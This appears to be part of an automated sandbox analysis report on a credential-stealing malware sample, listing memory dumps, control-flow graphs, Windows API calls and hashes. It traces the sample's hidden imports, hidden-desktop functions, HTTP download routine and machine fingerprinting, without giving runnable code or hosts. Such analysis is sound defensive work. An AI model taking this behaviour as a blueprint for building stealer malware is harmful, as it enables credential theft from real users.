                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocNameProcessUser
                                  • String ID:
                                  • API String ID: 1206570057-0
                                  • Opcode ID: f441c4103f55a8cc60a48f4db23ef6ffe0e65b6b9150c46087f6289059f7cad6
                                  • Instruction ID: 6e84f151364245c204a84120840d23ba4f97f6c1778d01ac3ace354f7dc506d6
                                  • Opcode Fuzzy Hash: f441c4103f55a8cc60a48f4db23ef6ffe0e65b6b9150c46087f6289059f7cad6
                                  • Instruction Fuzzy Hash: 3BF0B4B1A40244AFC700DF88DD49F9ABBBCF748B21F500226F914E3280D7B4190487E1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 633 906710-906717 634 90671d-906b29 GetProcAddress * 43 633->634 635 906b2e-906bc2 LoadLibraryA * 8 633->635 634->635 636 906bc4-906c33 GetProcAddress * 5 635->636 637 906c38-906c3f 635->637 636->637 638 906d02-906d09 637->638 639 906c45-906cfd GetProcAddress * 8 637->639 640 906d0b-906d7a GetProcAddress * 5 638->640 641 906d7f-906d86 638->641 639->638 640->641 642 906e19-906e20 641->642 643 906d8c-906e14 GetProcAddress * 6 641->643 644 906f40-906f47 642->644 645 906e26-906f3b GetProcAddress * 12 642->645 643->642 646 906f49-906fb8 GetProcAddress * 5 644->646 647 906fbd-906fc4 644->647 645->644 646->647 648 906ff1-906ff8 647->648 649 906fc6-906fec GetProcAddress * 2 647->649 650 907025-90702c 648->650 651 906ffa-907020 GetProcAddress * 2 648->651 649->648 652 907032-907118 GetProcAddress * 10 650->652 653 90711d-907124 650->653 651->650 652->653 654 907182-907189 653->654 655 907126-90717d GetProcAddress * 4 653->655 656 90718b-907199 GetProcAddress 654->656 657 90719e-9071a5 654->657 655->654 656->657 658 907203 657->658 659 9071a7-9071fe GetProcAddress * 4 657->659 659->658
                                  APIs
                                  • GetProcAddress.KERNEL32(76F70000,010C8720), ref: 00906725
                                  • GetProcAddress.KERNEL32(76F70000,010C8520), ref: 0090673D
                                  • GetProcAddress.KERNEL32(76F70000,010C26F0), ref: 00906756
                                  • GetProcAddress.KERNEL32(76F70000,010C27B0), ref: 0090676E
                                  • GetProcAddress.KERNEL32(76F70000,010C2780), ref: 00906786
                                  • GetProcAddress.KERNEL32(76F70000,010C2630), ref: 0090679F
                                  • GetProcAddress.KERNEL32(76F70000,010CBC98), ref: 009067B7
                                  • GetProcAddress.KERNEL32(76F70000,010C26C0), ref: 009067CF
                                  • GetProcAddress.KERNEL32(76F70000,010C26D8), ref: 009067E8
                                  • GetProcAddress.KERNEL32(76F70000,010C2558), ref: 00906800
                                  • GetProcAddress.KERNEL32(76F70000,010C2708), ref: 00906818
                                  • GetProcAddress.KERNEL32(76F70000,010C86E0), ref: 00906831
                                  • GetProcAddress.KERNEL32(76F70000,010C8440), ref: 00906849
                                  • GetProcAddress.KERNEL32(76F70000,010C84C0), ref: 00906861
                                  • GetProcAddress.KERNEL32(76F70000,010C87C0), ref: 0090687A
                                  • GetProcAddress.KERNEL32(76F70000,010C24E0), ref: 00906892
                                  • GetProcAddress.KERNEL32(76F70000,010C24F8), ref: 009068AA
                                  • GetProcAddress.KERNEL32(76F70000,010CBD10), ref: 009068C3
                                  • GetProcAddress.KERNEL32(76F70000,010C8540), ref: 009068DB
                                  • GetProcAddress.KERNEL32(76F70000,010C2528), ref: 009068F3
                                  • GetProcAddress.KERNEL32(76F70000,010C2750), ref: 0090690C
                                  • GetProcAddress.KERNEL32(76F70000,010C2540), ref: 00906924
                                  • GetProcAddress.KERNEL32(76F70000,010C2828), ref: 0090693C
                                  • GetProcAddress.KERNEL32(76F70000,010C8700), ref: 00906955
                                  • GetProcAddress.KERNEL32(76F70000,010CFB50), ref: 0090696D
                                  • GetProcAddress.KERNEL32(76F70000,010CFBC8), ref: 00906985
                                  • GetProcAddress.KERNEL32(76F70000,010CFB08), ref: 0090699E
                                  • GetProcAddress.KERNEL32(76F70000,010CFBE0), ref: 009069B6
                                  • GetProcAddress.KERNEL32(76F70000,010CF9D0), ref: 009069CE
                                  • GetProcAddress.KERNEL32(76F70000,010CFA30), ref: 009069E7
                                  • GetProcAddress.KERNEL32(76F70000,010CFA48), ref: 009069FF
                                  • GetProcAddress.KERNEL32(76F70000,010CF958), ref: 00906A17
                                  • GetProcAddress.KERNEL32(76F70000,010CFBF8), ref: 00906A30
                                  • GetProcAddress.KERNEL32(76F70000,010C4A20), ref: 00906A48
                                  • GetProcAddress.KERNEL32(76F70000,010CFAD8), ref: 00906A60
                                  • GetProcAddress.KERNEL32(76F70000,010CFC28), ref: 00906A79
                                  • GetProcAddress.KERNEL32(76F70000,010C8560), ref: 00906A91
                                  • GetProcAddress.KERNEL32(76F70000,010CFC10), ref: 00906AA9
                                  • GetProcAddress.KERNEL32(76F70000,010C8580), ref: 00906AC2
                                  • GetProcAddress.KERNEL32(76F70000,010CFA60), ref: 00906ADA
                                  • GetProcAddress.KERNEL32(76F70000,010CF970), ref: 00906AF2
                                  • GetProcAddress.KERNEL32(76F70000,010C8360), ref: 00906B0B
                                  • GetProcAddress.KERNEL32(76F70000,010C8120), ref: 00906B23
                                  • LoadLibraryA.KERNEL32(010CFAC0,0090067A), ref: 00906B35
                                  • LoadLibraryA.KERNEL32(010CF988), ref: 00906B46
                                  • LoadLibraryA.KERNEL32(010CFAF0), ref: 00906B58
                                  • LoadLibraryA.KERNEL32(010CF9A0), ref: 00906B6A
                                  • LoadLibraryA.KERNEL32(010CF940), ref: 00906B7B
                                  • LoadLibraryA.KERNEL32(010CFA00), ref: 00906B8D
                                  • LoadLibraryA.KERNEL32(010CFA18), ref: 00906B9F
                                  • LoadLibraryA.KERNEL32(010CFB68), ref: 00906BB0
                                  • GetProcAddress.KERNEL32(75840000,010C8240), ref: 00906BCC
                                  • GetProcAddress.KERNEL32(75840000,010CF9B8), ref: 00906BE4
                                  • GetProcAddress.KERNEL32(75840000,010CD7A8), ref: 00906BFD
                                  • GetProcAddress.KERNEL32(75840000,010CFB20), ref: 00906C15
                                  • GetProcAddress.KERNEL32(75840000,010C8300), ref: 00906C2D
                                  • GetProcAddress.KERNEL32(73AC0000,010CB7C0), ref: 00906C4D
                                  • GetProcAddress.KERNEL32(73AC0000,010C82E0), ref: 00906C65
                                  • GetProcAddress.KERNEL32(73AC0000,010CBB30), ref: 00906C7E
                                  • GetProcAddress.KERNEL32(73AC0000,010CF9E8), ref: 00906C96
                                  • GetProcAddress.KERNEL32(73AC0000,010CFB38), ref: 00906CAE
                                  • GetProcAddress.KERNEL32(73AC0000,010C82A0), ref: 00906CC7
                                  • GetProcAddress.KERNEL32(73AC0000,010C83A0), ref: 00906CDF
                                  • GetProcAddress.KERNEL32(73AC0000,010CFB80), ref: 00906CF7
                                  • GetProcAddress.KERNEL32(760B0000,010C8380), ref: 00906D13
                                  • GetProcAddress.KERNEL32(760B0000,010C80E0), ref: 00906D2B
                                  • GetProcAddress.KERNEL32(760B0000,010CFAA8), ref: 00906D44
                                  • GetProcAddress.KERNEL32(760B0000,010CFA78), ref: 00906D5C
                                  • GetProcAddress.KERNEL32(760B0000,010C83C0), ref: 00906D74
                                  • GetProcAddress.KERNEL32(75D30000,010CBAE0), ref: 00906D94
                                  • GetProcAddress.KERNEL32(75D30000,010CB900), ref: 00906DAC
                                  • GetProcAddress.KERNEL32(75D30000,010CFB98), ref: 00906DC5
                                  • GetProcAddress.KERNEL32(75D30000,010C8140), ref: 00906DDD
                                  • GetProcAddress.KERNEL32(75D30000,010C81C0), ref: 00906DF5
                                  • GetProcAddress.KERNEL32(75D30000,010CB8D8), ref: 00906E0E
                                  • GetProcAddress.KERNEL32(753A0000,010CFA90), ref: 00906E2E
                                  • GetProcAddress.KERNEL32(753A0000,010C8320), ref: 00906E46
                                  • GetProcAddress.KERNEL32(753A0000,010CD818), ref: 00906E5F
                                  • GetProcAddress.KERNEL32(753A0000,010CFBB0), ref: 00906E77
                                  • GetProcAddress.KERNEL32(753A0000,010CFD00), ref: 00906E8F
                                  • GetProcAddress.KERNEL32(753A0000,010C8340), ref: 00906EA8
                                  • GetProcAddress.KERNEL32(753A0000,010C8100), ref: 00906EC0
                                  • GetProcAddress.KERNEL32(753A0000,010CFC58), ref: 00906ED8
                                  • GetProcAddress.KERNEL32(753A0000,010CFC70), ref: 00906EF1
                                  • GetProcAddress.KERNEL32(753A0000,CreateDesktopA), ref: 00906F07
                                  • GetProcAddress.KERNEL32(753A0000,OpenDesktopA), ref: 00906F1E
                                  • GetProcAddress.KERNEL32(753A0000,CloseDesktop), ref: 00906F35
                                  • GetProcAddress.KERNEL32(76DA0000,010C8060), ref: 00906F51
                                  • GetProcAddress.KERNEL32(76DA0000,010CFC88), ref: 00906F69
                                  • GetProcAddress.KERNEL32(76DA0000,010CFCD0), ref: 00906F82
                                  • GetProcAddress.KERNEL32(76DA0000,010CFCA0), ref: 00906F9A
                                  • GetProcAddress.KERNEL32(76DA0000,010CFCB8), ref: 00906FB2
                                  • GetProcAddress.KERNEL32(77300000,010C83E0), ref: 00906FCE
                                  • GetProcAddress.KERNEL32(77300000,010C8400), ref: 00906FE6
                                  • GetProcAddress.KERNEL32(767E0000,010C8220), ref: 00907002
                                  • GetProcAddress.KERNEL32(767E0000,010CFCE8), ref: 0090701A
                                  • GetProcAddress.KERNEL32(6F6A0000,010C8080), ref: 0090703A
                                  • GetProcAddress.KERNEL32(6F6A0000,010C8160), ref: 00907052
                                  • GetProcAddress.KERNEL32(6F6A0000,010C8280), ref: 0090706B
                                  • GetProcAddress.KERNEL32(6F6A0000,010CFC40), ref: 00907083
                                  • GetProcAddress.KERNEL32(6F6A0000,010C8020), ref: 0090709B
                                  • GetProcAddress.KERNEL32(6F6A0000,010C8260), ref: 009070B4
                                  • GetProcAddress.KERNEL32(6F6A0000,010C80A0), ref: 009070CC
                                  • GetProcAddress.KERNEL32(6F6A0000,010C8040), ref: 009070E4
                                  • GetProcAddress.KERNEL32(6F6A0000,InternetSetOptionA), ref: 009070FB
                                  • GetProcAddress.KERNEL32(6F6A0000,HttpQueryInfoA), ref: 00907112
                                  • GetProcAddress.KERNEL32(75760000,010D0468), ref: 0090712E
                                  • GetProcAddress.KERNEL32(75760000,010CD798), ref: 00907146
                                  • GetProcAddress.KERNEL32(75760000,010D0378), ref: 0090715F
                                  • GetProcAddress.KERNEL32(75760000,010D0390), ref: 00907177
                                  • GetProcAddress.KERNEL32(762C0000,010C80C0), ref: 00907193
                                  • GetProcAddress.KERNEL32(6E970000,010D0438), ref: 009071AF
                                  • GetProcAddress.KERNEL32(6E970000,010C82C0), ref: 009071C7
                                  • GetProcAddress.KERNEL32(6E970000,010D0408), ref: 009071E0
                                  • GetProcAddress.KERNEL32(6E970000,010D0360), ref: 009071F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                  • API String ID: 2238633743-3468015613
                                  • Opcode ID: 4449d67393b3fde9ea2cfefc17b72c275dfd85b5bc3e8f15492f9d96918c46dc
                                  • Instruction ID: 90f980248ab42137f00ce7fa5c91668f8e1ec48d0c000a53a90716440d6dd179
                                  • Opcode Fuzzy Hash: 4449d67393b3fde9ea2cfefc17b72c275dfd85b5bc3e8f15492f9d96918c46dc
                                  • Instruction Fuzzy Hash: D3623EB5A10280EFD754DF64ECACAE637BAF78C641390C929E956C3364DF34A841DB60
                                  APIs
                                  • lstrlenA.KERNEL32(0090D014,00000001,00000000,00000000), ref: 008FF32E
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008FF34C
                                  • lstrlenA.KERNEL32(0090D014), ref: 008FF357
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008FF371
                                  • lstrlenA.KERNEL32(0090D014), ref: 008FF37C
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008FF396
                                  • lstrcpy.KERNEL32(00000000,00915558), ref: 008FF3BE
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008FF3EC
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008FF422
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008FF454
                                  • lstrlenA.KERNEL32(010C8460), ref: 008FF476
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008FF506
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008FF52B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008FF5E2
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 008FF894
                                  • lstrlenA.KERNEL32(010CD8D8), ref: 008FF8C2
                                  • lstrcpy.KERNEL32(00000000,010CD8D8), ref: 008FF8EF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008FF912
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008FF966
                                  • lstrcpy.KERNEL32(00000000,010CD8D8), ref: 008FFA28
                                  • lstrcpy.KERNEL32(00000000,010CD7E8), ref: 008FFA58
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008FFAB7
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 008FFBD5
                                  • lstrlenA.KERNEL32(010CD808), ref: 008FFC03
                                  • lstrcpy.KERNEL32(00000000,010CD808), ref: 008FFC30
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008FFC53
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008FFCA7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: ERROR
                                  • API String ID: 367037083-2861137601
                                  • Opcode ID: 8ec94abf2cb9464e88a49bb7c7e465fe13034809f01de14de82acdcab645db0e
                                  • Instruction ID: c4694487afe43269e88044f9ba16159ad5ccd3552a5b75b185e7e7b6edb49739
                                  • Opcode Fuzzy Hash: 8ec94abf2cb9464e88a49bb7c7e465fe13034809f01de14de82acdcab645db0e
                                  • Instruction Fuzzy Hash: 0FA239309012469FC724DF39C848A6ABBE8FF85714F588579EA49DB3A2DB31DC41CB91

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1889 8e6b80-8e6ba4 call 8e2840 1892 8e6ba6-8e6bab 1889->1892 1893 8e6bb5-8e6bd7 call 8e4ae0 1889->1893 1892->1893 1894 8e6bad-8e6baf lstrcpy 1892->1894 1897 8e6bea-8e6bfa call 8e2840 1893->1897 1898 8e6bd9 1893->1898 1894->1893 1902 8e6bfc-8e6c02 lstrcpy 1897->1902 1903 8e6c08-8e6c35 InternetOpenA StrCmpCA 1897->1903 1899 8e6be0-8e6be8 1898->1899 1899->1897 1899->1899 1902->1903 1904 8e6c3a-8e6c3c 1903->1904 1905 8e6c37 1903->1905 1906 8e6de8-8e6dfb call 8e2840 1904->1906 1907 8e6c42-8e6c62 InternetConnectA 1904->1907 1905->1904 1916 8e6dfd-8e6dff 1906->1916 1917 8e6e09-8e6e20 call 8e2930 * 2 1906->1917 1908 8e6c68-8e6c9d HttpOpenRequestA 1907->1908 1909 8e6de1-8e6de2 InternetCloseHandle 1907->1909 1911 8e6dd4-8e6dde InternetCloseHandle 1908->1911 1912 8e6ca3-8e6ca5 1908->1912 1909->1906 1911->1909 1914 8e6cbd-8e6ced HttpSendRequestA HttpQueryInfoA 1912->1914 1915 8e6ca7-8e6cb7 InternetSetOptionA 1912->1915 1918 8e6cef-8e6d13 call 907210 call 8e2930 * 2 1914->1918 1919 8e6d14-8e6d24 call 903d30 1914->1919 1915->1914 1916->1917 1920 8e6e01-8e6e03 lstrcpy 1916->1920 1919->1918 1928 8e6d26-8e6d28 1919->1928 1920->1917 1931 8e6d2e-8e6d47 InternetReadFile 1928->1931 1932 8e6dcd-8e6dce InternetCloseHandle 1928->1932 1931->1932 1934 8e6d4d 1931->1934 1932->1911 1936 8e6d50-8e6d55 1934->1936 1936->1932 1938 8e6d57-8e6d7d call 907340 1936->1938 1941 8e6d7f call 8e2930 1938->1941 1942 8e6d84-8e6d91 call 8e2840 1938->1942 1941->1942 1946 8e6d93-8e6d97 1942->1946 1947 8e6da1-8e6dcb call 8e2930 InternetReadFile 1942->1947 1946->1947 1948 8e6d99-8e6d9b lstrcpy 1946->1948 1947->1932 1947->1936 1948->1947
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E6BAF
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E6C02
                                  • InternetOpenA.WININET(0090D014,00000001,00000000,00000000,00000000), ref: 008E6C15
                                  • StrCmpCA.SHLWAPI(?,010CD6E8), ref: 008E6C2D
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008E6C55
                                  • HttpOpenRequestA.WININET(00000000,GET,?,010D1620,00000000,00000000,-00400100,00000000), ref: 008E6C90
                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 008E6CB7
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008E6CC6
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 008E6CE5
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 008E6D3F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E6D9B
                                  • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 008E6DBD
                                  • InternetCloseHandle.WININET(00000000), ref: 008E6DCE
                                  • InternetCloseHandle.WININET(?), ref: 008E6DD8
                                  • InternetCloseHandle.WININET(00000000), ref: 008E6DE2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008E6E03
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                  • String ID: ERROR$GET
                                  • API String ID: 3687753495-3591763792
                                  • Opcode ID: 79ed8f97994a7a12346e2863fbf670f9f554d2d1669704fbdf7f57b9d3e89010
                                  • Instruction ID: 671cf7931a1ba3d5b428832f330d11f40e01eb81b9ac2a0c45107d31740e2713
                                  • Opcode Fuzzy Hash: 79ed8f97994a7a12346e2863fbf670f9f554d2d1669704fbdf7f57b9d3e89010
                                  • Instruction Fuzzy Hash: CF819C71A41259ABEB20DFA5CC49BEE77B8FF45750F144068F904E7280EB70AE418B91

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1951 9026e0-902723 GetWindowsDirectoryA 1952 902725 1951->1952 1953 90272c-90278a GetVolumeInformationA 1951->1953 1952->1953 1954 90278c-902792 1953->1954 1955 902794-9027a7 1954->1955 1956 9027a9-9027c0 GetProcessHeap HeapAlloc 1954->1956 1955->1954 1957 9027c2-9027c4 1956->1957 1958 9027c6-9027e4 wsprintfA 1956->1958 1959 9027fb-902812 call 907210 1957->1959 1958->1959
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104,?,010CD728), ref: 0090271B
                                  • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,0090A470,00000000,00000000,00000000,00000000,?,010CD728), ref: 0090274C
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,010CD728), ref: 009027AF
                                  • HeapAlloc.KERNEL32(00000000,?,010CD728), ref: 009027B6
                                  • wsprintfA.USER32 ref: 009027DB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
